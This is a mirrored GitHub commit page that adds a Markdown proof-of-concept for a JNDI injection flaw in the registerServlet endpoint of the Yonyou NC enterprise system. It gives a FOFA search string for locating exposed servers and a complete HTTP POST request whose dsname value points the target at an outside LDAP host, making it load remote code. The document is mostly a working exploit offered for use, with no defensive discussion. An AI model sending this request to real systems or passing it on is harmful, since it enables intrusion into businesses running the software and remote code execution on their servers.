mirror of
https://github.com/wooluo/POC00.git
synced 2026-03-17 20:34:54 +08:00
Create 用友NC系统registerServlet接口存在JNDI注入漏洞.md
This commit is contained in:
parent
961a70e308
commit
2325890002
22
用友NC系统registerServlet接口存在JNDI注入漏洞.md
Normal file
22
用友NC系统registerServlet接口存在JNDI注入漏洞.md
Normal file
@ -0,0 +1,22 @@
|
||||
## 用友NC系统registerServlet接口存在JNDI注入漏洞
|
||||
|
||||
## fofa
|
||||
```
|
||||
body="Client/Uclient/UClient.dmg"
|
||||
```
|
||||
|
||||
|
||||
## poc
|
||||
```
|
||||
POST /portal/registerServlet HTTP/1.1
|
||||
Host: 192.168.63.129:8088
|
||||
User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 68
|
||||
|
||||
type=1&dsname=ldap://172.17.176.1:8085/blvVEcJU1
|
||||
```
|
||||
|
||||

|
||||
|
||||

|
||||
Loading…
x
Reference in New Issue
Block a user